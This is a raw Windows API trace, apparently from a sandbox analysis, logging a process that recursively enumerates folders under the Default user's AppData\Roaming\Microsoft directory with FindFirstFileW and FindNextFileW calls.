	[0102.340] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\CTLs\\\\*", lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b70
	[0102.340] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.340] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.340] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.340] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.340] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0102.340] FindClose (in: hFindFile=0x213b70 | out: hFindFile=0x213b70) returned 1
	[0102.340] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 0
	[0102.340] FindClose (in: hFindFile=0x213b30 | out: hFindFile=0x213b30) returned 1
	[0102.340] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 0
	[0102.341] FindClose (in: hFindFile=0x213af0 | out: hFindFile=0x213af0) returned 1
	[0102.341] FindNextFileW (in: hFindFile=0x213a70, lpFindFileData=0x128390 | out: lpFindFileData=0x128390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x89642899, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1
	[0102.341] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1
	[0102.341] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1
	[0102.341] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\*", lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x89642899, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213af0
	[0102.343] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.343] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x89642899, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.343] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.343] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.343] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfa0acc0b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x8a6c6157, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1
	[0102.343] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7d9c391e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IECompatCache", cAlternateFileName="IECOMP~1")) returned 1
	[0102.343] lstrcmpiW (lpString1="IECompatCache", lpString2=".") returned 1
	[0102.343] lstrcmpiW (lpString1="IECompatCache", lpString2="..") returned 1
	[0102.343] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\IECompatCache\\\\*", lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7d9c391e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b30
	[0102.343] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.343] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7d9c391e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.343] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.343] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.343] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7d9c391e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1
	[0102.343] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7d9c391e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 0
	[0102.344] FindClose (in: hFindFile=0x213b30 | out: hFindFile=0x213b30) returned 1
	[0102.344] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0bb7cc0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x8a81cdba, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IETldCache", cAlternateFileName="IETLDC~1")) returned 1
	[0102.344] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f74bcf, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1
	[0102.344] lstrcmpiW (lpString1="Libraries", lpString2=".") returned 1
	[0102.344] lstrcmpiW (lpString1="Libraries", lpString2="..") returned 1
	[0102.344] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Libraries\\\\*", lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f74bcf, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b30
	[0102.345] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.345] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f74bcf, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.345] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.345] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.345] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xa0b91b60, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f4ea6f, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0102.345] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa0b91b60, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4edc64e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0xe02, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents.library-ms", cAlternateFileName="DOCUME~1.LIB")) returned 1
	[0102.345] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa0b91b60, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f74bcf, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0xdd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music.library-ms", cAlternateFileName="MUSIC~1.LIB")) returned 1
	[0102.345] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa0b91b60, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f2890e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0xdfa, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures.library-ms", cAlternateFileName="PICTUR~1.LIB")) returned 1
	[0102.345] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa0b91b60, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f4ea6f, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0xde5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms", cAlternateFileName="VIDEOS~1.LIB")) returned 1
	[0102.345] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa0b91b60, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f4ea6f, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0xde5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms", cAlternateFileName="VIDEOS~1.LIB")) returned 0
	[0102.345] FindClose (in: hFindFile=0x213b30 | out: hFindFile=0x213b30) returned 1
	[0102.346] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa0acc0b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa0acc0b, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x69cee3d3, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Shortcuts", cAlternateFileName="NETWOR~1")) returned 1
	[0102.346] lstrcmpiW (lpString1="Network Shortcuts", lpString2=".") returned 1
	[0102.346] lstrcmpiW (lpString1="Network Shortcuts", lpString2="..") returned 1
	[0102.346] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Network Shortcuts\\\\*", lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa0acc0b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa0acc0b, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x69cee3d3, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b30
	[0102.347] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.347] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa0acc0b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa0acc0b, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x69cee3d3, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.347] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.347] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.347] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa0acc0b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa0acc0b, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x69cee3d3, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0102.347] FindClose (in: hFindFile=0x213b30 | out: hFindFile=0x213b30) returned 1
	[0102.350] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa0acc0b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa0acc0b, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6efcbf86, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Printer Shortcuts", cAlternateFileName="PRINTE~1")) returned 1
	[0102.350] lstrcmpiW (lpString1="Printer Shortcuts", lpString2=".") returned 1
	[0102.350] lstrcmpiW (lpString1="Printer Shortcuts", lpString2="..") returned 1
	[0102.350] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Printer Shortcuts\\\\*", lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa0acc0b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa0acc0b, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6efcbf86, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b30
	[0102.350] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.350] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa0acc0b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa0acc0b, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6efcbf86, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.350] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.350] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.350] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa0acc0b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa0acc0b, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6efcbf86, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0102.350] FindClose (in: hFindFile=0x213b30 | out: hFindFile=0x213b30) returned 1
	[0102.350] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a61060, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7d9c391e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrivacIE", cAlternateFileName="")) returned 1
	[0102.350] lstrcmpiW (lpString1="PrivacIE", lpString2=".") returned 1
	[0102.350] lstrcmpiW (lpString1="PrivacIE", lpString2="..") returned 1
	[0102.350] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\PrivacIE\\\\*", lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a61060, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7d9c391e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b30
	[0102.351] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.351] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a61060, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7d9c391e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.351] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.351] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.351] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a61060, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7d9c391e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1
	[0102.351] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a61060, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7d9c391e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 0
	[0102.351] FindClose (in: hFindFile=0x213b30 | out: hFindFile=0x213b30) returned 1
	[0102.351] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0acc0b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1
	[0102.351] lstrcmpiW (lpString1="Recent", lpString2=".") returned 1
	[0102.351] lstrcmpiW (lpString1="Recent", lpString2="..") returned 1
	[0102.351] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\*", lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0acc0b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b30
	[0102.352] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.352] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0acc0b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.352] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.352] lstrcmpiW (lpString1="..", lpString2="..") returned 0
